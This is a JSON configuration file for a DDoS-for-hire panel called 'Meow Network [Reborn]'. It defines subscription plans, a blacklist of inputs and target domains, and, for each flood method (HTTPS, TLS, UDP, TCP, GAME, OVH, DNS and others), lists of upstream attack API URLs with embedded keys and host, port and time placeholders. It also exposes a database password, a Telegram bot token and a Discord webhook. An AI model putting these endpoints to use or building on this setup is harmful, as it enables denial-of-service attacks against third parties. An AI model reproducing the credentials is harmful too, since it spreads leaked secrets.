{
    "server_config": {
        "ssh_addr": "116.103.229.45",
        "private_key": "assets/sshKey.ppk"
    },
    "database": {
        "host": "localhost:3306",
        "username": "cc3m2",
        "password": "cc3m43!?",
        "table": "cc3m"
    },
    "settings": {
        "general": {
            "log_ips": false,
            "name": "Meow Network [Reborn]",
            "auto_reload": true
        },
        "title": {
            "title_spinner": true,
            "online_clients": "Online",
            "running_attacks": "Running",
            "display_username": {
                "greeting": "Welcome, ",
                "enabled": true
            },
            "display_expiry": {
                "prefix": "Plan Expiry: ",
                "enabled": true
            },
            "title_update_sleep": 500,
            "fake_botnet_title": {
                "max": 1200,
                "min": 1000,
                "prefix": "Bots: ",
                "suffix": " | Thank you for your trust in our service.",
                "enabled": false
            }
        },
        "information_rewrites": {
            "ip_address": "*.*.*.*",
            "username": "Anonymous",
            "unknown_sshclient": "Unknown"
        },
        "disabled_commands": [],
        "developer": {
            "terminal": {
                "width": 522,
                "height": 22
            }
        }
    },
    "webhooks": {
        "telegram": {
            "token": "6171307436:AAHLyEQ0s7rGwz_ac5th0LHwhBLfXE0DRi4",
            "chatid": "-4069933442",
            "enabled": true
        },
        "discord": {
            "webhook": "https://discord.com/api/webhooks/1159387871912939620/ygI-v9O3LqNPHHsNVSFhPf_65rTsxz6kUKD4HNe0jl9-991GFYqo6vWODcSvKdKsevle",
            "image": "",
            "enabled": false
        }
    },
    "attack_settings": {
        "blacklists": [
            ".gov",
            ".edu",
            "curl",
            ".ru",
            "russia",
            "wget",
            ">",
            "github",
            "<",
            "mysql",
            "localhost",
            "space",
            "graph",
            "hit",
            "dstat"
        ],
        "attacks": {
            "enabled": true,
            "slots": {
                "max": 1,
                "enabled": true
            },
            "spamcheck": {
                "general": {
                    "amount": 2,
                    "per_seconds": 30,
                    "enabled": true
                },
                "target": {
                    "amount": 2,
                    "per_seconds": 30,
                    "enabled": true
                }
            }
        }
    },
    "presets": [
        {
            "name": "1M",
            "config": {
                "maxtime": 60,
                "concurrents": 1,
                "vip": false,
                "expiry": 31
            }
        },
        {
            "name": "1M-VIP",
            "config": {
                "maxtime": 60,
                "concurrents": 1,
                "vip": true,
                "expiry": 31
            }
        },
        {
            "name": "LIFE",
            "config": {
                "maxtime": 60,
                "concurrents": 1,
                "vip": false,
                "expiry": 999
            }
        },
        {
            "name": "LIFE-VIP",
            "config": {
                "maxtime": 60,
                "concurrents": 1,
                "vip": true,
                "expiry": 999
            }
        }
    ],
    "themes": [
        {
            "name": "default",
            "description": "Minimalistic, clean, and simple.",
            "example": "assets/banners/default/commands/clear-splash.txt",
            "colour": "[97m"
        },
        {
            "name": "pink",
            "description": "Default theme with a pink twist added.",
            "example": "assets/banners/pink/commands/clear-splash.txt",
            "colour": "[95m"
        }
    ],
    "banners": [
        {
            "name": "methods",
            "description": "View the available methods.",
            "require_role": {
                "admin": false,
                "mod": false,
                "reseller": false
            },
            "path": "assets/banners/{THEME}/commands/methods.txt",
            "aliases": [
                "method"
            ]
        },
        {
            "name": "usage",
            "description": "View the correct way to attack.",
            "require_role": {
                "admin": false,
                "mod": false,
                "reseller": false
            },
            "path": "assets/banners/{THEME}/commands/usage.txt",
            "aliases": [
                "syntax"
            ]
        },
        {
            "name": "plan",
            "description": "View your plan information.",
            "require_role": {
                "admin": false,
                "mod": false,
                "reseller": false
            },
            "path": "assets/banners/{THEME}/commands/plan.txt",
            "aliases": [
                "acc",
                "account"
            ]
        },
        {
            "name": "help",
            "description": "View the help menu and banner.",
            "require_role": {
                "admin": false,
                "mod": false,
                "reseller": false
            },
            "path": "assets/banners/{THEME}/commands/help.txt",
            "aliases": [
                "h",
                "?"
            ]
        },
        {
            "name": "rules",
            "description": "View the rules and tos.",
            "require_role": {
                "admin": false,
                "mod": false,
                "reseller": false
            },
            "path": "assets/banners/{THEME}/commands/rules.txt",
            "aliases": [
                "tos"
            ]
        }
    ],
    "attacks": [
        {
            "method": "HTTPS",
            "links": [
                "http://51.81.230.244:9901/api/attack?username=andanh20233&key=andanh20233&host={HOST}&port={PORT}&time={TIME}&method=HTTP",
                "http://45.140.188.169:999/api/attack?username=meow&key=meow1&host={HOST}&port={PORT}&time={TIME}&method=HTTPS-VIP&concurrents=1",
                "http://45.128.232.98:1337/yuze/api?key=andanh89&host={HOST}&port={PORT}&time={TIME}&method=HTTPS",
                "https://api.tcp-entropy.xyz/api/attack?key=SNprMvr4mIhP&target={HOST}&port={PORT}&duration={TIME}&method=!bypass",
                "http://172.104.163.183:8080/api?key=andanh-jsx&host={HOST}&port={PORT}&time={TIME}&method=https",
                "http://185.225.75.43:1337/botnet/api?key=tcpsyn!&host={HOST}&port={PORT}&time={TIME}&method=https",
                "http://cia-network.lol:8080/cia/api?key=616-422-113&host={HOST}&port={PORT}&time={TIME}&method=!HTTP",
                "https://seized.lol/api/attack?username=andanh&key=andaho29&host={HOST}&port={PORT}&time={TIME}&method=!https-vip",
                "http://45.41.241.26/api/send?username=meow&token=Demon-djivnsiuvjsdv&host={HOST}&port={PORT}&time={TIME}&method=https"
            ],
            "config": {
                "slots": {
                    "max": 1,
                    "enabled": true
                },
                "maxtime": {
                    "hard": {
                        "time": 120,
                        "enabled": true
                    },
                    "soft": {
                        "time": 60,
                        "enabled": true
                    }
                },
                "status": {
                    "enabled": true,
                    "vip": false,
                    "private": {
                        "enabled": false,
                        "users": [
                            "root",
                            "mypartner"
                        ]
                    }
                }
            }
        },
        {
            "method": "TLS",
            "links": [
                "http://51.81.230.244:9901/api/attack?username=andanh20233&key=andanh20233&host={HOST}&port={PORT}&time={TIME}&method=TLS",
                "http://45.140.188.169:999/api/attack?username=meow&key=meow1&host={HOST}&port={PORT}&time={TIME}&method=TLS&concurrents=1",
                "https://api.tcp-entropy.xyz/api/attack?key=SNprMvr4mIhP&target={HOST}&port={PORT}&duration={TIME}&method=!tls",
                "http://172.104.163.183:8080/api?key=andanh-jsx&host={HOST}&port={PORT}&time={TIME}&method=tlsv2",
                "http://185.225.75.43:1337/botnet/api?key=tcpsyn!&host={HOST}&port={PORT}&time={TIME}&method=tls",
                "https://seized.lol/api/attack?username=andanh&key=andaho29&host={HOST}&port={PORT}&time={TIME}&method=tls-vip",
                "http://45.93.200.142:1337/api/attack?host={HOST}&port={PORT}&time={TIME}&method=TLS&key=tcpacksyn23",
                "https://stresse.ink/api/attack?username=clienttrade&secret=clienttradekey&host={HOST}&port={POST}&time={TIME}&method=https",
                "http://45.41.241.26/api/send?username=meow&token=Demon-djivnsiuvjsdv&host={HOST}&port={PORT}&time={TIME}&method=TLS-BETA",
                "http://84.54.51.47/api/attack?username=bbbb&key=bbbb&host={HOST}&port={PORT}&time={TIME}&method=.TLS",
                "https://gorilla-spoofed-api.cloud/api/attack?username=coyo&secret=coyopenisissmall&host={HOST}&port={PORT}&time={TIME}&method=HTTPS",
                "http://84.54.51.176:1337/astra/api?username=meowapi&key=changeme&host={HOST}&port={PORT}&time={TIME}&method=TLS"
            ],
            "config": {
                "slots": {
                    "max": 1,
                    "enabled": true
                },
                "maxtime": {
                    "hard": {
                        "time": 120,
                        "enabled": true
                    },
                    "soft": {
                        "time": 60,
                        "enabled": true
                    }
                },
                "status": {
                    "enabled": true,
                    "vip": false,
                    "private": {
                        "enabled": false,
                        "users": [
                            "root",
                            "mypartner"
                        ]
                    }
                }
            }
        },
        {
            "method": "BROWSER",
            "links": [
                "http://51.81.230.244:9901/api/attack?username=andanh20233&key=andanh20233&host={HOST}&port={PORT}&time={TIME}&method=BROWSER",
                "http://45.140.188.169:999/api/attack?username=meow&key=meow1&host={HOST}&port={PORT}&time={TIME}&method=BROWSERX&concurrents=1",
                "http://172.104.163.183:8080/api?key=andanh-jsx&host={HOST}&port={PORT}&time={TIME}&method=bypass",
                "http://opticstress.lol/api/attack?username=tcpsyn&secret=tcpsyn25565&host={HOST}&port={PORT}&time={TIME}&method=BROWSER",
                "https://seized.lol/api/attack?username=andanh&key=andaho29&host={HOST}&port={PORT}&time={TIME}&method=!browser-vip",
                "http://45.41.241.26/api/send?username=meow&token=Demon-djivnsiuvjsdv&host={HOST}&port={PORT}&time={TIME}&method=BROWSER",
                "https://gorilla-spoofed-api.cloud/api/attack?username=coyo&secret=coyopenisissmall&host={HOST}&port={PORT}&time={TIME}&method=HTTPSBYPASS",
                "http://84.54.51.176:1337/astra/api?username=meowapi&key=changeme&host={HOST}&port={PORT}&time={TIME}&method=HTTPRAW"
            ],
            "config": {
                "slots": {
                    "max": 1,
                    "enabled": true
                },
                "maxtime": {
                    "hard": {
                        "time": 120,
                        "enabled": true
                    },
                    "soft": {
                        "time": 60,
                        "enabled": true
                    }
                },
                "status": {
                    "enabled": true,
                    "vip": true,
                    "private": {
                        "enabled": false,
                        "users": [
                            "root",
                            "mypartner"
                        ]
                    }
                }
            }
        },
        {
            "method": "UDP",
            "links": [
                "http://51.81.230.244:9901/api/attack?username=andanh20233&key=andanh20233&host={HOST}&port={PORT}&time={TIME}&method=UDP",
                "http://45.140.188.169:999/api/attack?username=meow&key=meow1&host={HOST}&port={PORT}&time={TIME}&method=UDP-VIP&concurrents=1",
                "http://45.128.232.98:1337/yuze/api?key=andanh89&host={HOST}&port={PORT}&time={TIME}&method=UDP",
                "https://api.tcp-entropy.xyz/api/attack?key=SNprMvr4mIhP&target={HOST}&port={PORT}&duration={TIME}&method=!udp",
                "http://185.225.75.43:1337/botnet/api?key=tcpsyn!&host={HOST}&port={PORT}&time={TIME}&method=UDP",
                "http://opticstress.lol/api/attack?username=tcpsyn&secret=tcpsyn25565&host={HOST}&port={PORT}&time={TIME}&method=UDP",
                "https://seized.lol/api/attack?username=andanh&key=andaho29&host={HOST}&port={PORT}&time={TIME}&method=!udp-vip",
                "http://45.41.241.26/api/send?username=meow&token=Demon-djivnsiuvjsdv&host={HOST}&port={PORT}&time={TIME}&method=UDP",
                "http://84.54.51.47/api/attack?username=bbbb&key=bbbb&host={HOST}&port={PORT}&time={TIME}&method=.UDP",
                "https://gorilla-spoofed-api.cloud/api/attack?username=coyo&secret=coyopenisissmall&host={HOST}&port={PORT}&time={TIME}&method=UDP",
                "http://84.54.51.176:1337/astra/api?username=meowapi&key=changeme&host={HOST}&port={PORT}&time={TIME}&method=UDP-BYPASS"
            ],
            "config": {
                "slots": {
                    "max": 1,
                    "enabled": true
                },
                "maxtime": {
                    "hard": {
                        "time": 120,
                        "enabled": true
                    },
                    "soft": {
                        "time": 60,
                        "enabled": true
                    }
                },
                "status": {
                    "enabled": true,
                    "vip": false,
                    "private": {
                        "enabled": false,
                        "users": [
                            "root",
                            "mypartner"
                        ]
                    }
                }
            }
        },
        {
            "method": "GUDP",
            "links": [
                "http://51.81.230.244:9901/api/attack?username=andanh20233&key=andanh20233&host={HOST}&port={PORT}&time={TIME}&method=GUDP",
                "http://45.140.188.169:999/api/attack?username=meow&key=meow1&host={HOST}&port={PORT}&time={TIME}&method=GUDP&concurrents=1",
                "http://cia-network.lol:8080/cia/api?key=616-422-113&host={HOST}&port={PORT}&time={TIME}&method=!GUDP",
                "https://gorilla-spoofed-api.cloud/api/attack?username=coyo&secret=coyopenisissmall&host={HOST}&port={PORT}&time={TIME}&method=UDPBYPASS",
                "http://84.54.51.176:1337/astra/api?username=meowapi&key=changeme&host={HOST}&port={PORT}&time={TIME}&method=GUDP"
            ],
            "config": {
                "slots": {
                    "max": 1,
                    "enabled": true
                },
                "maxtime": {
                    "hard": {
                        "time": 120,
                        "enabled": true
                    },
                    "soft": {
                        "time": 60,
                        "enabled": true
                    }
                },
                "status": {
                    "enabled": true,
                    "vip": true,
                    "private": {
                        "enabled": false,
                        "users": [
                            "root",
                            "mypartner"
                        ]
                    }
                }
            }
        },
        {
            "method": "PUDP",
            "links": [
                "http://51.81.230.244:9901/api/attack?username=andanh20233&key=andanh20233&host={HOST}&port={PORT}&time={TIME}&method=PUDP",
                "http://45.140.188.169:999/api/attack?username=meow&key=meow1&host={HOST}&port={PORT}&time={TIME}&method=UDPKILL&concurrents=1",
                "http://cia-network.lol:8080/cia/api?key=616-422-113&host={HOST}&port={PORT}&time={TIME}&method=PUDP",
                "http://84.54.51.47/api/attack?username=bbbb&key=bbbb&host={HOST}&port={PORT}&time={TIME}&method=.PUDP"
            ],
            "config": {
                "slots": {
                    "max": 1,
                    "enabled": true
                },
                "maxtime": {
                    "hard": {
                        "time": 120,
                        "enabled": true
                    },
                    "soft": {
                        "time": 60,
                        "enabled": true
                    }
                },
                "status": {
                    "enabled": true,
                    "vip": false,
                    "private": {
                        "enabled": false,
                        "users": [
                            "root",
                            "mypartner"
                        ]
                    }
                }
            }
        },
        {
            "method": "TCP",
            "links": [
                "http://51.81.230.244:9901/api/attack?username=andanh20233&key=andanh20233&host={HOST}&port={PORT}&time={TIME}&method=TCP",
                "http://45.140.188.169:999/api/attack?username=meow&key=meow1&host={HOST}&port={PORT}&time={TIME}&method=TCP-VIP&concurrents=1",
                "http://45.128.232.98:1337/yuze/api?key=andanh89&host={HOST}&port={PORT}&time={TIME}&method=TCP",
                "https://api.tcp-entropy.xyz/api/attack?key=SNprMvr4mIhP&target={HOST}&port={PORT}&duration={TIME}&method=!tcp",
                "http://185.225.75.43:1337/botnet/api?key=tcpsyn!&host={HOST}&port={PORT}&time={TIME}&method=tcp",
                "http://cia-network.lol:8080/cia/api?key=616-422-113&host={HOST}&port={PORT}&time={TIME}&method=!TCPBYPASS",
                "http://opticstress.lol/api/attack?username=tcpsyn&secret=tcpsyn25565&host={HOST}&port={PORT}&time={TIME}&method=TCP",
                "https://seized.lol/api/attack?username=andanh&key=andaho29&host={HOST}&port={PORT}&time={TIME}&method=!tcp-vip",
                "http://84.54.51.47/api/attack?username=bbbb&key=bbbb&host={HOST}&port={PORT}&time={TIME}&method=.TCP",
                "https://gorilla-spoofed-api.cloud/api/attack?username=coyo&secret=coyopenisissmall&host={HOST}&port={PORT}&time={TIME}&method=TCPBYPASS",
                "http://84.54.51.176:1337/astra/api?username=meowapi&key=changeme&host={HOST}&port={PORT}&time={TIME}&method=TCP"
            ],
            "config": {
                "slots": {
                    "max": 1,
                    "enabled": true
                },
                "maxtime": {
                    "hard": {
                        "time": 120,
                        "enabled": true
                    },
                    "soft": {
                        "time": 60,
                        "enabled": true
                    }
                },
                "status": {
                    "enabled": true,
                    "vip": false,
                    "private": {
                        "enabled": false,
                        "users": [
                            "root",
                            "mypartner"
                        ]
                    }
                }
            }
        },
        {
            "method": "GAME",
            "links": [
                "http://51.81.230.244:9901/api/attack?username=andanh20233&key=andanh20233&host={HOST}&port={PORT}&time={TIME}&method=GAME",
                "http://45.140.188.169:999/api/attack?username=meow&key=meow1&host={HOST}&port={PORT}&time={TIME}&method=GAME&concurrents=1",
                "http://45.128.232.98:1337/i/api?key=andanh89&host={HOST}&port={PORT}&time={TIME}&method=game",
                "http://185.225.75.43:1337/botnet/api?key=tcpsyn!&host={HOST}&port={PORT}&time={TIME}&method=game",
                "http://opticstress.lol/api/attack?username=tcpsyn&secret=tcpsyn25565&host={HOST}&port={PORT}&time={TIME}&method=GAME",
                "http://cia-network.lol:8080/cia/api?key=616-422-113&host={HOST}&port={PORT}&time={TIME}&method=!KILLALL",
                "http://84.54.51.47/api/attack?username=bbbb&key=bbbb&host={HOST}&port={PORT}&time={TIME}&method=.GAME",
                "https://gorilla-spoofed-api.cloud/api/attack?username=coyo&secret=coyopenisissmall&host={HOST}&port={PORT}&time={TIME}&method=GAME",
                "http://84.54.51.176:1337/astra/api?username=meowapi&key=changeme&host={HOST}&port={PORT}&time={TIME}&method=GAME"
            ],
            "config": {
                "slots": {
                    "max": 1,
                    "enabled": true
                },
                "maxtime": {
                    "hard": {
                        "time": 120,
                        "enabled": true
                    },
                    "soft": {
                        "time": 60,
                        "enabled": true
                    }
                },
                "status": {
                    "enabled": true,
                    "vip": false,
                    "private": {
                        "enabled": false,
                        "users": [
                            "root",
                            "mypartner"
                        ]
                    }
                }
            }
        },
        {
            "method": "ACK",
            "links": [
                "http://51.81.230.244:9901/api/attack?username=andanh20233&key=andanh20233&host={HOST}&port={PORT}&time={TIME}&method=ACK",
                "http://45.140.188.169:999/api/attack?username=meow&key=meow1&host={HOST}&port={PORT}&time={TIME}&method=ACK-RAW&concurrents=1",
                "http://185.225.75.43:1337/botnet/api?key=tcpsyn!&host={HOST}&port={PORT}&time={TIME}&method=syn",
                "http://cia-network.lol:8080/cia/api?key=616-422-113&host={HOST}&port={PORT}&time={TIME}&method=!ACK",
                "http://84.54.51.47/api/attack?username=bbbb&key=bbbb&host={HOST}&port={PORT}&time={TIME}&method=.SYN",
                "https://gorilla-spoofed-api.cloud/api/attack?username=coyo&secret=coyopenisissmall&host={HOST}&port={PORT}&time={TIME}&method=HANDSHAKE",
                "http://84.54.51.176:1337/astra/api?username=meowapi&key=changeme&host={HOST}&port={PORT}&time={TIME}&method=TCPBYPASS"
            ],
            "config": {
                "slots": {
                    "max": 1,
                    "enabled": true
                },
                "maxtime": {
                    "hard": {
                        "time": 120,
                        "enabled": true
                    },
                    "soft": {
                        "time": 60,
                        "enabled": true
                    }
                },
                "status": {
                    "enabled": true,
                    "vip": true,
                    "private": {
                        "enabled": false,
                        "users": [
                            "root",
                            "mypartner"
                        ]
                    }
                }
            }
        },
        {
            "method": "DNS",
            "links": [
                "http://51.81.230.244:9901/api/attack?username=andanh20233&key=andanh20233&host={HOST}&port={PORT}&time={TIME}&method=DNS",
                "http://185.225.75.43:1337/botnet/api?key=tcpsyn!&host={HOST}&port={PORT}&time={TIME}&method=dns",
                "http://cia-network.lol:8080/cia/api?key=616-422-113&host={HOST}&port={PORT}&time={TIME}&method=!DNS",
                "http://84.54.51.47/api/attack?username=bbbb&key=bbbb&host={HOST}&port={PORT}&time={TIME}&method=.HOME",
                "https://gorilla-spoofed-api.cloud/api/attack?username=coyo&secret=coyopenisissmall&host={HOST}&port={PORT}&time={TIME}&method=HOME",
                "http://84.54.51.176:1337/astra/api?username=meowapi&key=changeme&host={HOST}&port={PORT}&time={TIME}&method=DNS"
            ],
            "config": {
                "slots": {
                    "max": 1,
                    "enabled": true
                },
                "maxtime": {
                    "hard": {
                        "time": 120,
                        "enabled": true
                    },
                    "soft": {
                        "time": 60,
                        "enabled": true
                    }
                },
                "status": {
                    "enabled": true,
                    "vip": false,
                    "private": {
                        "enabled": false,
                        "users": [
                            "root",
                            "mypartner"
                        ]
                    }
                }
            }
        },
        {
            "method": "SOCKET",
            "links": [
                "http://51.81.230.244:9901/api/attack?username=andanh20233&key=andanh20233&host={HOST}&port={PORT}&time={TIME}&method=SOCKET",
                "https://api.tcp-entropy.xyz/api/attack?key=SNprMvr4mIhP&target={HOST}&port={PORT}&duration={TIME}&method=!socket",
                "http://185.225.75.43:1337/botnet/api?key=tcpsyn!&host={HOST}&port={PORT}&time={TIME}&method=ssh",
                "http://cia-network.lol:8080/cia/api?key=616-422-113&host={HOST}&port={PORT}&time={TIME}&method=!TCPSOCKET",
                "http://84.54.51.47/api/attack?username=bbbb&key=bbbb&host={HOST}&port={PORT}&time={TIME}&method=.SOCKET",
                "https://gorilla-spoofed-api.cloud/api/attack?username=coyo&secret=coyopenisissmall&host={HOST}&port={PORT}&time={TIME}&method=SOCKET",
                "http://84.54.51.176:1337/astra/api?username=meowapi&key=changeme&host={HOST}&port={PORT}&time={TIME}&method=HANDSHAKE"
            ],
            "config": {
                "slots": {
                    "max": 1,
                    "enabled": true
                },
                "maxtime": {
                    "hard": {
                        "time": 120,
                        "enabled": true
                    },
                    "soft": {
                        "time": 60,
                        "enabled": true
                    }
                },
                "status": {
                    "enabled": true,
                    "vip": false,
                    "private": {
                        "enabled": false,
                        "users": [
                            "root",
                            "mypartner"
                        ]
                    }
                }
            }
        },
        {
            "method": "OVH",
            "links": [
                "http://51.81.230.244:9901/api/attack?username=andanh20233&key=andanh20233&host={HOST}&port={PORT}&time={TIME}&method=OVH",
                "http://45.140.188.169:999/api/attack?username=meow&key=meow1&host={HOST}&port={PORT}&time={TIME}&method=OVH-VIP&concurrents=1",
                "http://45.128.232.98:1337/yuze/api?key=andanh89&host={HOST}&port={PORT}&time={TIME}&method=OVH",
                "https://api.tcp-entropy.xyz/api/attack?key=SNprMvr4mIhP&target={HOST}&port={PORT}&duration={TIME}&method=!ovh",
                "http://185.225.75.43:1337/botnet/api?key=tcpsyn!&host={HOST}&port={PORT}&time={TIME}&method=ovh",
                "http://cia-network.lol:8080/cia/api?key=616-422-113&host={HOST}&port={PORT}&time={TIME}&method=!OVHRAW",
                "http://opticstress.lol/api/attack?username=tcpsyn&secret=tcpsyn25565&host={HOST}&port={PORT}&time={TIME}&method=OVH",
                "https://seized.lol/api/attack?username=andanh&key=andaho29&host={HOST}&port={PORT}&time={TIME}&method=!ovh-vip",
                "http://45.41.241.26/api/send?username=meow&token=Demon-djivnsiuvjsdv&host={HOST}&port={PORT}&time={TIME}&method=ovh",
                "http://84.54.51.47/api/attack?username=bbbb&key=bbbb&host={HOST}&port={PORT}&time={TIME}&method=.OVH",
                "https://gorilla-spoofed-api.cloud/api/attack?username=coyo&secret=coyopenisissmall&host={HOST}&port={PORT}&time={TIME}&method=OVHTCP"
            ],
            "config": {
                "slots": {
                    "max": 1,
                    "enabled": true
                },
                "maxtime": {
                    "hard": {
                        "time": 120,
                        "enabled": true
                    },
                    "soft": {
                        "time": 60,
                        "enabled": true
                    }
                },
                "status": {
                    "enabled": true,
                    "vip": false,
                    "private": {
                        "enabled": false,
                        "users": [
                            "kingcobra",
                            "johnthegoat"
                        ]
                    }
                }
            }
        }
    ]
}